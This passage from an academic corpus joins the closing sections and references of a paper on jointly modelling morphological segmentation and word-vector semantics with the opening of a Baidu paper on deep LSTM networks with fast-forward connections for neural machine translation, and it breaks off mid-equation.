models have fewer parameters than our morpheme-level models—there are many more morphemes in a languages than characters. Oracle Morphology. In general, the two- morpheme assumption is incorrect. We consider an expanded setting of Lazaridou et al. (2013)’s task, in which we fully decompose the word, e.g., unquestionably7→un+question+able+ly. These results are reported in Table 3 (top block, “oracle”). We report mean cosine similarity. Standard devia- tions s for 10-fold cross-validation (not shown) are small (≤ .012) with two exceptions: s = .044 for the DEPs-joint-stem results (.411 and .412). The multi-morphemic results mirror those of the bi-morphemic setting of Lazaridou et al. (2013). (i) RNN+DEPs attains an average cosine similarity of around .80 for English. Numbers for German are lower, around .70. (ii) The RNN only marginally edges out LDS for English and is slightly worse for German. Again, this is not surprising as we are mod- eling short sequences. (iii) Certain embeddings lend themselves more naturally to derivational composi- tionality: BOW2 is better than BOW5, DEPs is the clear winner. Inferred Morphology. The final setting we con- sider is the vector approximation task without gold morphology. In this case, we rely on the full joint model p(v,s, l,u | w). At evaluation, we are in- terested in the marginal distribution p(v | w) =∑ s,l,u p(v,s, l,u | w). We then use importance sampling to approximate the mean of this marginal distribution as the predicted embedding, i.e., v̂ = ∫ vp(v | w)dv (12) ≈ 1∑M i=1 w (i) M∑ i=1 w(i)Cβ(l(i),s(i)), (13) where w(i) are the importance weights defined in Equation 8 and l(i) and s(i) are the ith sampled la- beling and segmentation, respectively. Discussion. Surprisingly, Table 3 (joint) shows that relying on the inferred morphology does not drastically affect the results. Indeed, we are often within .01 of the result with gold morphology. Our method can be viewed as a retrofitting procedure (Faruqui et al., 2015), so this result is useful: it indi- cates that joint semantic synthesis and morphologi- cal analysis produces high-quality vectors. 6.3 Experiment 3: Derivational Productivity We now delve into the relation between distribu- tional semantics and morphological productivity. The extent to which jointly modeling semantics aids morphological analysis will be determined by the in- herent compositionality of the words within the vec- tor space. We break down our results on the vector approximation task with gold morphology using the 43 -ly -ness -ize -able in- -ful -ous -less -ic -ist -y un- -ity re- -ion -ment -al -er Affix 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0 A v er a g e C o si n e S im il a ri ty Figure 2: The boxplot breaks down the cosine similarity between the approximated vector and the target vector by affix (using gold morphology). We have ordered the affixes such that the better approximated vectors are on the left. dependency vectors and the RNN composer in Fig- ure 2 by selected affixes. We observe a wide range of scores: the most compositional ending ly gives rise to cosine similarities that are 20 points higher than those of the least compositional er. On the left end of Figure 2 we see extremely pro- ductive suffixes. The affix ize is used productively with relatively obscure words in the sciences, e.g., Rao-Blackwellize. Likewise, the affix ness can be applied to almost any adjective without restriction, e.g., Poissonness ‘degree to which data have a Pois- son distribution’. On the right end, we find -ment, -er and re-. The affix -ment is borderline productive (Bauer, 1983)—modern English tends to form novel nominalizations with ness or ity. More interesting are re- and er, both of which are very productive in English. For er, many of the words bringing down the average are simply non-compositional. For ex- ample, homer ‘homerun in baseball’ is not derived from home+er—this is an error in data. We also see examples like cutter. It has a compositional read- ing (e.g., “box cutter”), but also frequently occurs in the non-compositional meaning ‘type of boat’. Fi- nally, proper nouns like Homer and Turner end in er and in our experiments we computed vectors for lowercased words. The affix re- similarly has a large number of non-compositional cases, e.g., remove, relocate, remark. Indeed, to get the compositional reading of remove, the first syllable (rather than the second) is typically stressed to emphasize the prefix. We finally note several limitations of this exper- iment. (i) The ability of our models—even the re- current neural network—to model transformations between vectors is limited. (ii) Our vectors are far from perfect; e.g., sparseness in the training data af- fects quality and some of the words in our corpus are rare. (iii) Semantic coherence is not the only crite- rion for productivity. An example is -th in English. As noted earlier, it is compositional in a word like warmth, but it cannot be used to form new words. 7 Conclusion We have presented a model of the semantics and structure of derivationally complex words. To the best of our knowledge, this is the first attempt to jointly consider, within a single model, (i) the mor- phological decomposition of the word form and (ii) the semantic coherence of the resulting anal- ysis. We found that directly modeling coherence increases segmentation accuracy, improving over a strong baseline. Also, our models show state-of-the- art performance on the derivational vector approxi- mation task introduced by Lazaridou et al. (2013). Future work will focus on the extension of the method to more complex instances of derivational morphology, e.g., compounding and reduplication, and on the extension to additional languages. We also plan to explore the relation between derivation and distributional semantics in greater detail. 44 Acknowledgments. The first author was sup- ported by a DAAD Long-Term Research Grant and an NDSEG fellowship and the second by a Volk- swagenstiftung Opus Magnum grant. We would also like to thank action editor Regina Barzilay for suggesting several changes we incorporated into the work and the three anonymous reviewers. References Mohamed Afify, Ruhi Sarikaya, Hong-Kwang Jeff Kuo, Laurent Besacier, and Yuqing Gao. 2006. On the use of morphological analysis for dialectal Arabic speech recognition. In Ninth International Conference on Spoken Language Processing. Mark Aronoff. 1976. Word Formation in Generative Grammar. MIT Press. Harald Baayen, Richard Piepenbrock, and Hedderik van Rijn. 1993. The CELEX lexical data base on CD- ROM. Miguel Ballesteros, Chris Dyer, and Noah A. Smith. 2015. Improved transition-based parsing by model- ing characters instead of words with LSTMs. In Pro- ceedings of the 2015 Conference on Empirical Meth- ods in Natural Language Processing, pages 349–359, Lisbon, Portugal, September. Association for Compu- tational Linguistics. Laurie Bauer. 1983. English Word-Formation. Cam- bridge University Press. Yoshua Bengio and Jean-Sébastien Senecal. 2003. Quick training of probabilistic neural nets by impor- tance sampling. In Proceedings of the Ninth Interna- tional Conference on Artificial Intelligence and Statis- tics. Jan A. Botha and Phil Blunsom. 2014. Compositional morphology for word representations and language modelling. In International Conference on Machine Learning, pages 1899–1907. Kyunghyun Cho, Bart van Merriënboer, Dzmitry Bah- danau, and Yoshua Bengio. 2014a. On the properties of neural machine translation: Encoder–decoder ap- proaches. Workshop On Syntax, Semantics and Struc- ture in Statistical Translation. Kyunghyun Cho, Bart Van Merriënboer, Caglar Gul- cehre, Dzmitry Bahdanau, Fethi Bougares, Holger Schwenk, and Yoshua Bengio. 2014b. Learning phrase representations using RNN encoder-decoder for statistical machine translation. In Conference on Empirical Methods in Natural Language Processing. Noam Chomsky and Morris Halle. 1968. The sound pat- tern of English. Harper & Row. Noam Chomsky. 1965. Aspects of the Theory of Syntax. MIT Press. Ann Clifton and Anoop Sarkar. 2011. Combin- ing morpheme-based machine translation with post- processing morpheme prediction. In Proceedings of the 49th Annual Meeting of the Association for Com- putational Linguistics: Human Language Technolo- gies, pages 32–42, Portland, Oregon, USA, June. As- sociation for Computational Linguistics. Ryan Cotterell, Nanyun Peng, and Jason Eisner. 2014. Stochastic contextual edit distance and probabilistic FSTs. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (Vol- ume 2: Short Papers), pages 625–630, Baltimore, Maryland, June. Association for Computational Lin- guistics. Ryan Cotterell, Thomas Müller, Alexander Fraser, and Hinrich Schütze. 2015. Labeled morphological seg- mentation with semi-Markov models. In Proceed- ings of the Nineteenth Conference on Computational Natural Language Learning, pages 164–174, Beijing, China, July. Association for Computational Linguis- tics. Ryan Cotterell, Arun Kumar, and Hinrich Schütze. 2016a. Morphological segmentation inside-out. In Proceedings of the 2016 Conference on Empiri- cal Methods in Natural Language Processing, pages 2325–2330, Austin, Texas, November. Association for Computational Linguistics. Ryan Cotterell, Tim Vieira, and Hinrich Schütze. 2016b. A joint model of orthography and morphological seg- mentation. In Proceedings of the 2016 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Tech- nologies, pages 664–669, San Diego, California, June. Association for Computational Linguistics. Mathias Creutz and Krista Lagus. 2007. Unsupervised models for morpheme segmentation and morphology learning. ACM Transactions on Speech and Language Processing, 4(1):3. Cı́cero Nogueira dos Santos and Bianca Zadrozny. 2014. Learning character-level representations for part-of- speech tagging. In International Conference on Ma- chine Learning, pages 1818–1826. Markus Dreyer and Jason Eisner. 2011. Discover- ing morphological paradigms from plain text using a Dirichlet process mixture model. In Proceedings of the 2011 Conference on Empirical Methods in Natural Language Processing, pages 616–627. Association for Computational Linguistics, July. Markus Dreyer. 2011. A Non-parametric Model for the Discovery of Inflectional Paradigms from Plain Text using Graphical Models over Strings. Ph.D. thesis, Johns Hopkins University. John Duchi, Elad Hazan, and Yoram Singer. 2011. Adaptive subgradient methods for online learning and 45 stochastic optimization. Journal of Machine Learning Research, 12:2121–2159. Jeffrey L. Elman. 1990. Finding structure in time. Cog- nitive Science, 14(2):179–211. Manaal Faruqui, Jesse Dodge, Sujay Kumar Jauhar, Chris Dyer, Eduard Hovy, and Noah A. Smith. 2015. Retrofitting word vectors to semantic lexicons. In Pro- ceedings of the 2015 Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics: Human Language Technologies, pages 1606– 1615, Denver, Colorado, May–June. Association for Computational Linguistics. Manaal Faruqui, Ryan McDonald, and Radu Soricut. 2016a. Morpho-syntactic lexicon generation using graph-based semi-supervised learning. Transactions of the Association for Computational Linguistics, 4:1– 16. Manaal Faruqui, Yulia Tsvetkov, Graham Neubig, and Chris Dyer. 2016b. Morphological inflection gen- eration using character sequence to sequence learn- ing. In Proceedings of the 2016 Conference of the North American Chapter of the Association for Com- putational Linguistics: Human Language Technolo- gies, pages 634–643, San Diego, California, June. As- sociation for Computational Linguistics. Orhan Firat, Kyunghyun Cho, and Yoshua Bengio. 2016. Multi-way, multilingual neural machine translation with a shared attention mechanism. In Proceedings of the 2016 Conference of the North American Chap- ter of the Association for Computational Linguistics: Human Language Technologies, pages 866–875, San Diego, California, June. Association for Computa- tional Linguistics. Gottlob Frege. 1892. Über Begriff und Gegenstand. Vierteljahresschrift für wissenschaftliche Philosophie, 16:192–205. Dan Gillick, Cliff Brunk, Oriol Vinyals, and Amarnag Subramanya. 2016. Multilingual language process- ing from bytes. In Proceedings of the 2016 Confer- ence of the North American Chapter of the Associa- tion for Computational Linguistics: Human Language Technologies, pages 1296–1306, San Diego, Califor- nia, June. Association for Computational Linguistics. Christoph Goller and Andreas Küchler. 1996. Learning task-dependent distributed representations by back- propagation through structure. In IEEE International Conference on Neural Networks. Kazuma Hashimoto and Yoshimasa Tsuruoka. 2016. Adaptive joint learning of compositional and non- compositional phrase embeddings. In Proceedings of the 54th Annual Meeting of the Association for Com- putational Linguistics (Volume 1: Long Papers), pages 205–215, Berlin, Germany, August. Association for Computational Linguistics. Martin Haspelmath and Andrea Sims. 2013. Under- standing morphology. Routledge. Irene Heim and Angelika Kratzer. 1998. Semantics in Generative Grammar. Blackwell. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9(8):1735– 1780. Katharina Kann, Ryan Cotterell, and Hinrich Schütze. 2016. Neural morphological analysis: Encoding- decoding canonical segments. In Proceedings of the 2016 Conference on Empirical Methods in Natural Language Processing, pages 961–967, Austin, Texas, November. Association for Computational Linguis- tics. Ronald M. Kaplan and Martin Kay. 1994. Regular mod- els of phonological rule systems. Computational Lin- guistics, 20(3):331–378. Martin Kay. 1977. Morphological and syntactic analysis. Linguistic Structures Processing, 5:131. Yoon Kim, Yacine Jernite, David Sontag, and Alexan- der M. Rush. 2016. Character-aware neural language models. In Proceedings of the Thirtieth AAAI Confer- ence on Artificial Intelligence, pages 2741–2749. Diederik Kingma and Jimmy Ba. 2015. Adam: A method for stochastic optimization. In International Conference on Learning Representations. Max Kisselew, Sebastian Padó, Alexis Palmer, and Jan Šnajder. 2015. Obtaining a better understanding of distributional models of German derivational morphol- ogy. In Proceedings of the 11th International Confer- ence on Computational Semantics, pages 58–63. Daphne Koller and Nir Friedman. 2009. Probabilistic Graphical Models: Principles and Techniques. MIT Press. Lingpeng Kong, Chris Dyer, and Noah A Smith. 2016. Segmental recurrent neural networks. In 4th Interna- tional Conference on Learning Representations. Mikko Kurimo, Sami Virpioja, Ville Turunen, and Krista Lagus. 2010. Morpho Challenge competition 2005– 2010: Evaluations and results. In Special Interest Group on Computational Morphology and Phonology. Angeliki Lazaridou, Marco Marelli, Roberto Zamparelli, and Marco Baroni. 2013. Compositional-ly derived representations of morphologically complex words in distributional semantics. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 1517– 1526, Sofia, Bulgaria, August. Association for Com- putational Linguistics. Omer Levy and Yoav Goldberg. 2014a. Dependency- based word embeddings. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers), pages 302–308, 46 Baltimore, Maryland, June. Association for Computa- tional Linguistics. Omer Levy and Yoav Goldberg. 2014b. Neural word embedding as implicit matrix factorization. In Ad- vances in Neural Information Processing Systems, pages 2177–2185. Marc Light. 1996. Morphological cues for lexical se- mantics. In Proceedings of the 34th Annual Meeting of the Association for Computational Linguistics, pages 25–31, Santa Cruz, California, USA, June. Associa- tion for Computational Linguistics. Wang Ling, Chris Dyer, Alan W. Black, Isabel Trancoso, Ramon Fermandez, Silvio Amir, Luis Marujo, and Tiago Luis. 2015. Finding function in form: Com- positional character models for open vocabulary word representation. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Process- ing, pages 1520–1530, Lisbon, Portugal, September. Association for Computational Linguistics. Thang Luong, Richard Socher, and Christopher Man- ning. 2013. Better word representations with recur- sive neural networks for morphology. In Proceedings of the Seventeenth Conference on Computational Nat- ural Language Learning, pages 104–113, Sofia, Bul- garia, August. Association for Computational Linguis- tics. John Lyons. 1977. Semantics. Cambridge University Press. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013a. Efficient estimation of word representa- tions in vector space. In 2th International Conference on Learning Representations. Tomas Mikolov, Ilya Sutskever, Kai Chen, Gregory S. Corrado, and Jeffrey Dean. 2013b. Distributed rep- resentations of words and phrases and their composi- tionality. In Advances in neural information process- ing systems, pages 3111–3119. Jeff Mitchell and Mirella Lapata. 2008. Vector-based models of semantic composition. In Proceedings of Association of Computational Linguistics, pages 236– 244, Columbus, Ohio, June. Association for Computa- tional Linguistics. Kevin P. Murphy. 2012. Machine Learning: A Proba- bilistic Perspective. MIT Press. Jason Naradowsky and Sharon Goldwater. 2009. Im- proving morphology induction by learning spelling rules. In Twenty-first International Joint Conference on Artificial Intelligence, pages 1531–1536. Karthik Narasimhan, Damianos Karakos, Richard Schwartz, Stavros Tsakalidis, and Regina Barzilay. 2014. Morphological segmentation for keyword spot- ting. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 880–885, Doha, Qatar, October. As- sociation for Computational Linguistics. Karthik Narasimhan, Regina Barzilay, and Tommi Jaakkola. 2015. An unsupervised method for uncov- ering morphological chains. Transactions of the Asso- ciation for Computational Linguistics, 3:157–167. OUP editors. 2010. New Oxford American Dictionary. Oxford University Press. Sebastian Padó, Alexis Palmer, Max Kisselew, and Jan Šnajder. 2015. Measuring semantic content to as- sess asymmetry in derivation. In Proceedings of the 11th International Conference on Computational Se- mantics. Lawrence R. Rabiner. 1989. A tutorial on hidden Markov models and selected applications in speech recognition. Proceedings of the Institute of Electrical and Electronics Engineers, 77(2):257–286. Pushpendre Rastogi, Ryan Cotterell, and Jason Eisner. 2016. Weighting finite-state transductions with neu- ral context. In Proceedings of the 2016 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Tech- nologies, pages 623–633, San Diego, California, June. Association for Computational Linguistics. Eric S. Ristad and Peter N. Yianilos. 1998. Learning string-edit distance. IEEE Transactions on Pattern Analysis and Machine Intelligence, 20(5):522–532. Reuven Y. Rubinstein and Dirk P. Kroese. 2011. Sim- ulation and the Monte Carlo method. John Wiley & Sons. Teemu Ruokolainen, Oskar Kohonen, Sami Virpioja, and Mikko Kurimo. 2013. Supervised morphological seg- mentation in a low-resource learning setting using con- ditional random fields. In Proceedings of the Sev- enteenth Conference on Computational Natural Lan- guage Learning, pages 29–37, Sofia, Bulgaria, Au- gust. Association for Computational Linguistics. Gerard Salton, editor. 1971. The SMART Retrieval System—Experiments in Automatic Document Pro- cessing. Prentice Hall. Sunita Sarawagi and William W. Cohen. 2005. Semi- Markov conditional random fields for information ex- traction. In Advances in neural information process- ing systems, pages 1185–1192. Patrick Schone and Daniel Jurafsky. 2000. Knowledge- free induction of morphology using latent semantic analysis. In Proceedings the 4th Conference on Com- putational Natural Language Learning, pages 67–72. Association for Computational Linguistics. Patrick Schone and Daniel Jurafsky. 2001. Knowledge- free induction of inflectional morphologies. In Pro- ceedings of the Second Meeting of the North American 47 Chapter of the Association for Computational Linguis- tics on Language Technologies, pages 1–9. Associa- tion for Computational Linguistics. Wolfgang Seeker and Özlem Çetinoğlu. 2015. A graph- based lattice dependency parser for joint morpholog- ical segmentation and syntactic analysis. Transac- tions of the Association for Computational Linguistics, 3:359–373. Radu Soricut and Franz Och. 2015. Unsupervised mor- phology induction using word embeddings. In Pro- ceedings of the 2015 Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics: Human Language Technologies, pages 1627– 1637, Denver, Colorado, May–June. Association for Computational Linguistics. Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. Se- quence to sequence learning with neural networks. In Advances in Neural Information Processing Systems, pages 3104–3112. Charles Sutton and Andrew McCallum. 2006. An in- troduction to conditional random fields for relational learning. In Lise Getoor and Ben Taskar, editors, Introduction to Statistical Relational Learning, pages 93–128. MIT Press. Peter D. Turney and Patrick Pantel. 2010. From fre- quency to meaning: Vector space models of semantics. Journal of Artificial Intelligence Research, 37(1):141– 188. Antal van den Bosch and Walter Daelemans. 1999. Memory-based morphological analysis. In Proceed- ings of the 37th Annual Meeting of the Association for Computational Linguistics, pages 285–292, College Park, Maryland, USA, June. Association for Compu- tational Linguistics. Martin J. Wainwright and Michael I. Jordan. 2008. Graphical models, exponential families, and varia- tional inference. Foundations and Trends in Machine Learning, 1(1-2):1–305. Zhen Wang, Jianwen Zhang, Jianlin Feng, and Zheng Chen. 2014. Knowledge graph and text jointly em- bedding. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 1591–1601, Doha, Qatar, October. Association for Computational Linguistics. Paul J. Werbos. 1990. Backpropagation through time: What it does and how to do it. Proceedings of the Institute of Electrical and Electronics Engineers, 78(10):1550–1560. Richard Wicentowski. 2002. Modeling and Learning Multilingual Inflectional Morphology in a Minimally Supervised Framework. Ph.D. thesis, Johns Hopkins University. Yadollah Yaghoobzadeh and Hinrich Schütze. 2015. Corpus-level fine-grained entity typing using contex- tual information. In Proceedings of the 2015 Confer- ence on Empirical Methods in Natural Language Pro- cessing, pages 715–725, Lisbon, Portugal, September. Association for Computational Linguistics. David Yarowsky and Richard Wicentowski. 2000. Min- imally supervised morphological analysis by multi- modal alignment. In The 38th Annual Meeting of the Association for Computational Linguistics. Wenpeng Yin and Hinrich Schütze. 2015. Convolutional neural network for paraphrase identification. In Pro- ceedings of the 2015 Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics: Human Language Technologies, pages 901– 911, Denver, Colorado, May–June. Association for Computational Linguistics. Britta D. Zeller, Jan Šnajder, and Sebastian Padó. 2013. DErivBase: Inducing and evaluating a derivational morphology resource for German. In Proceedings of the 51st Annual Meeting of the Association for Com- putational Linguistics (Volume 1: Long Papers), pages 1201–1211, Sofia, Bulgaria, August. Association for Computational Linguistics. Britta D. Zeller, Sebastian Padó, and Jan Šnajder. 2014. Towards semantic validation of a derivational lexicon. In Proceedings the 25th International Conference on Computational Linguistics, pages 1728–1739, Dublin, Ireland, August. Dublin City University and Associa- tion for Computational Linguistics. 48 work_cziuyuoc3ffuznqfiluyvprwpq ---- Deep Recurrent Models with Fast-Forward Connections for Neural Machine Translation Jie Zhou Ying Cao Xuguang Wang Peng Li Wei Xu Baidu Research - Institute of Deep Learning Baidu Inc., Beijing, China {zhoujie01,caoying03,wangxuguang,lipeng17,wei.xu}@baidu.com Abstract Neural machine translation (NMT) aims at solving machine translation (MT) problems using neural networks and has exhibited promising results in recent years. However, most of the existing NMT models are shallow and there is still a performance gap between a single NMT model and the best conventional MT system. In this work, we introduce a new type of linear connections, named fast- forward connections, based on deep Long Short-Term Memory (LSTM) networks, and an interleaved bi-directional architecture for stacking the LSTM layers. Fast-forward con- nections play an essential role in propagat- ing the gradients and building a deep topol- ogy of depth 16. On the WMT’14 English- to-French task, we achieve BLEU=37.7 with a single attention model, which outperforms the corresponding single shallow model by 6.2 BLEU points. This is the first time that a sin- gle NMT model achieves state-of-the-art per- formance and outperforms the best conven- tional model by 0.7 BLEU points. We can still achieve BLEU=36.3 even without using an attention mechanism. After special han- dling of unknown words and model ensem- bling, we obtain the best score reported to date on this task with BLEU=40.4. Our models are also validated on the more difficult WMT’14 English-to-German task. 1 Introduction Neural machine translation (NMT) has attracted a lot of interest in solving the machine translation (MT) problem in recent years (Kalchbrenner and Blunsom, 2013; Sutskever et al., 2014; Bahdanau et al., 2015). Unlike conventional statistical ma- chine translation (SMT) systems (Koehn et al., 2003; Durrani et al., 2014) which consist of multi- ple separately tuned components, NMT models en- code the source sequence into continuous represen- tation space and generate the target sequence in an end-to-end fashon. Moreover, NMT models can also be easily adapted to other tasks such as dialog systems (Vinyals and Le, 2015), question answering systems (Yu et al., 2015) and image caption genera- tion (Mao et al., 2015). In general, there are two types of NMT topolo- gies: the encoder-decoder network (Sutskever et al., 2014) and the attention network (Bahdanau et al., 2015). The encoder-decoder network represents the source sequence with a fixed dimensional vector and the target sequence is generated from this vector word by word. The attention network uses the repre- sentations from all time steps of the input sequence to build a detailed relationship between the target words and the input words. Recent results show that the systems based on these models can achieve sim- ilar performance to conventional SMT systems (Lu- ong et al., 2015; Jean et al., 2015). However, a single neural model of either of the above types has not been competitive with the best conventional system (Durrani et al., 2014) when evaluated on the WMT’14 English-to-French task. The best BLEU score from a single model with six layers is only 31.5 (Luong et al., 2015) while the conventional method of (Durrani et al., 2014) achieves 37.0. We focus on improving the single model perfor- 371 Transactions of the Association for Computational Linguistics, vol. 4, pp. 371–383, 2016. Action Editor: Holger Schwenk. Submission batch: 1/2016; Revision batch: 4/2016; Published 7/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. mance by increasing the model depth. Deep topol- ogy has been proven to outperform the shallow ar- chitecture in computer vision. In the past two years the top positions of the ImageNet contest have al- ways been occupied by systems with tens or even hundreds of layers (Szegedy et al., 2015; He et al., 2016). But in NMT, the biggest depth used success- fully is only six (Luong et al., 2015). We attribute this problem to the properties of the Long Short- Term Memory (LSTM) (Hochreiter and Schmid- huber, 1997) which is widely used in NMT. In the LSTM, there are more non-linear activations than in convolution layers. These activations significantly decrease the magnitude of the gradient in the deep topology, especially when the gradient propagates in recurrent form. There are also many efforts to increase the depth of the LSTM such as the work by Kalchbrenner et al. (2016), where the shortcuts do not avoid the nonlinear and recurrent computation. In this work, we introduce a new type of lin- ear connections for multi-layer recurrent networks. These connections, which are called fast-forward connections, play an essential role in building a deep topology with depth of 16. In addition, we in- troduce an interleaved bi-directional architecture to stack LSTM layers in the encoder. This topology can be used for both the encoder-decoder network and the attention network. On the WMT’14 English- to-French task, this is the deepest NMT topology that has ever been investigated. With our deep at- tention model, the BLEU score can be improved to 37.7 outperforming the shallow model which has six layers (Luong et al., 2015) by 6.2 BLEU points. This is also the first time on this task that a single NMT model achieves state-of-the-art performance and outperforms the best conventional SMT sys- tem (Durrani et al., 2014) with an improvement of 0.7. Even without using the attention mechanism, we can still achieve 36.3 with a single model. After model ensembling and unknown word processing, the BLEU score can be further improved to 40.4. When evaluated on the subset of the test corpus without unknown words, our model achieves 41.4. As a reference, previous work showed that oracle re- scoring of the 1000-best sequences generated by the SMT model can achieve the BLEU score of about 45 (Sutskever et al., 2014). Our models are also validated on the more difficult WMT’14 English-to- German task. 2 Neural Machine Translation Neural machine translation aims at generating the target word sequence y = {y1, . . . ,yn} given the source word sequence x = {x1, . . . ,xm} with neu- ral models. In this task, the likelihood p(y | x,θ) of the target sequence will be maximized (Forcada and Ñeco, 1997) with parameter θ to learn: p(y | x;θ) = m+1∏ j=1 p(yj | y0:j−1,x;θ) (1) where y0:j−1 is the sub sequence from y0 to yj−1. y0 and ym+1 denote the start mark and end mark of target sequence respectively. The process can be explicitly split into an encod- ing part, a decoding part and the interface between these two parts. In the encoding part, the source se- quence is processed and transformed into a group of vectors e = {e1, · · · ,em} for each time step. Fur- ther operations will be used at the interface part to extract the final representation c of the source se- quence from e. At the decoding step, the target se- quence is generated from the representation c. Recently, there have been two types of NMT mod- els which are different in the interface part. In the encoder-decoder model (Sutskever et al., 2014), a single vector extracted from e is used as the rep- resentation. In the attention model (Bahdanau et al., 2015), c is dynamically obtained according to the relationship between the target sequence and the source sequence. The recurrent neural network (RNN), or its spe- cific form the LSTM, is generally used as the basic unit of the encoding and decoding part. However, the topology of most of the existing models is shal- low. In the attention network, the encoding part and the decoding part have only one LSTM layer respec- tively. In the encoder-decoder network, researchers have used at most six LSTM layers (Luong et al., 2015). Because machine translation is a difficult problem, we believe more complex encoding and decoding architecture is needed for modeling the re- lationship between the source sequence and the tar- get sequence. In this work, we focus on enhancing the complexity of the encoding/decoding architec- ture by increasing the model depth. 372 Deep neural models have been studied in a wide range of problems. In computer vision, models with more than ten convolution layers outperform shallow ones on a series of image tasks in recent years (Srivastava et al., 2015; He et al., 2016; Szegedy et al., 2015). Different kinds of shortcut connections are proposed to decrease the length of the gradient propagation path. Training networks based on LSTM layers, which are widely used in language problems, is a much more challenging task. Because of the existence of many more nonlin- ear activations and the recurrent computation, gradi- ent values are not stable and are generally smaller. Following the same spirit for convolutional net- works, a lot of effort has also been spent on training deep LSTM networks. Yao et al. (2015) introduced depth-gated shortcuts, connecting LSTM cells at ad- jacent layers, to provide a fast way to propagate the gradients. They validated the modification of these shortcuts on an MT task and a language modeling task. However, the best score was obtained using models with three layers. Similarly, Kalchbrenner et al. (2016) proposed a two dimensional structure for the LSTM. Their structure decreases the number of nonlinear activations and path length. However, the gradient propagation still relies on the recurrent computation. The investigations were also made on question-answering to encode the questions, where at most two LSTM layers were stacked (Hermann et al., 2015). Based on the above considerations, we propose new connections to facilitate gradient propagation in the following section. 3 Deep Topology We build the deep LSTM network with the new pro- posed linear connections. The shortest paths through the proposed connections do not include any non- linear transformations and do not rely on any recur- rent computation. We call these connections fast- forward connections. Within the deep topology, we also introduce an interleaved bi-directional architec- ture to stack the LSTM layers. 3.1 Network Our entire deep neural network is shown in Fig. 2. This topology can be divided into three parts: the encoder part (P-E) on the left, the decoder part (P- D) on the right and the interface between these two parts (P-I) which extracts the representation of the source sequence. We have two instantiations of this topology: Deep-ED and Deep-Att, which corre- spond to the extension of the encoder-decoder net- work and the attention network respectively. Our main innovation is the novel scheme for connecting adjacent recurrent layers. We will start with the ba- sic RNN model for the sake of clarity. Recurrent layer: When an input sequence {x1, . . . ,xm} is given to a recurrent layer, the out- put ht at each time step t can be computed as (see Fig. 1 (a)) ht = σ(Wfxt + Wrht−1) = RNN (Wfxt,ht−1) = RNN (ft,ht−1), (2) where the bias parameter is not included for simplic- ity. We use a red circle and a blue empty square to denote an input and a hidden state. A blue square with a “-” denotes the previous hidden state. A dot- ted line means that the hidden state is used recur- rently. This computation can be equivalently split into two consecutive steps: • Feed-Forward computation: ft = Wfxt. Left part in Fig. 1 (b). “f” block. • Recurrent computation: RNN (ft,ht−1). Right part and the sum operation (+) followed by activation in Fig. 1 (b). “r” block. For a deep topology with stacked recurrent layers, the input of each block “f” at recurrent layer k (de- noted by fk) is usually the output of block “r” at its previous recurrent layer k − 1 (denoted by hk−1). In our work, we add fast-forward connections (F-F connections) which connect two feed-forward com- putation blocks “f” of adjacent recurrent layers. It means that each block “f” at recurrent layer k takes both the outputs of block “f” and block “r” at its pre- vious layer as input (Fig. 1 (c)). F-F connections are denoted by dashed red lines in Fig. 1 (c) and Fig. 2. The path of F-F connections contains neither non- linear activations nor recurrent computation. It pro- vides a fast path for information to propagate, so we call this path fast-forward connections. 373 t t t - - - - - - - -(a) (b) (c) F-F Wf Wr ht ht-1x ht Wf Wr x ht-1 x ht-1 Wf 2 Wf 1 ht1 ht2 1 ht-1 2 f t f t 1 f t 2 block f block r Figure 1: RNN models. The recurrent use of a hidden state is denoted by dotted lines. A “-” mark denotes the hidden value of the previous time step. (a): Basic RNN. (b): Basic RNN with intermediate computational state and the sum operation (+) followed by activation. It consists of block “f” and block “r”, and is equivalent to (a). (c):Two stacked RNN layers with F-F connections denoted by dashed red lines. Additionally, in order to learn more temporal dependencies, the sequences can be processed in different directions at each pair of adjacent recurrent layers. This is quantitatively expressed in Eq. 3: fkt = W k f · [fk−1t ,hk−1t ], k > 1 fkt = W k f xt k = 1 hkt = RNN k (fkt ,h k t+(−1)k) (3) The opposite directions are marked by the direction term (−1)k. At the first recurrent layer, the block “f” takes xt as the input. [ , ] denotes the concatenation of vectors. This is shown in Fig. 1 (c). The two changes are summarized here: • We add a connection between fkt and fk−1t . Without fk−1t , our model will be reduced to the traditional stacked model. • We alternate the RNN direction at different lay- ers k with the direction term (−1)k. If we fix the direction term to −1, all layers work in the forward direction. LSTM layer: In our experiments, instead of an RNN, a specific type of recurrent layer called LSTM (Hochreiter and Schmidhuber, 1997; Graves et al., 2009) is used. The LSTM is structurally more complex than the basic RNN in Eq. 2. We de- fine the computation of the LSTM as a function which maps the input f and its state-output pair (h,s) at the previous time step to the current state- output pair. The exact computations for (ht,st) = LSTM(ft,ht−1,st−1) are the following: [z,zρ,zφ,zπ] = ft + Wrht−1 st = σi(z)◦σg(zρ + st−1 ◦θρ) + σg(zφ + st−1 ◦θφ)◦st−1 ht = σo(st)◦σg(zπ + st ◦θπ) (4) where [z,zρ,zφ,zπ] is the concatenation of four vec- tors of equal size, ◦ means element-wise multiplica- tion, σi is the input activation function, σo is the out- put activation function, σg is the activation function for gates, and Wr, θρ, θφ, and θπ are the parame- ters of the LSTM. It is slightly different from the standard notation in that we do not have a matrix to multiply with the input f in our notation. With this notation, we can write down the com- putations for our deep bi-directional LSTM model with F-F connections: fkt = W k f · [fk−1t ,hk−1t ], k > 1 fkt = W k f xt, k = 1 (hkt ,s k t ) = LSTM k ( fkt ,h k t+(−1)k,s k t+(−1)k ) (5) where xt is the input to the deep bi-directional LSTM model. For the encoder, xt is 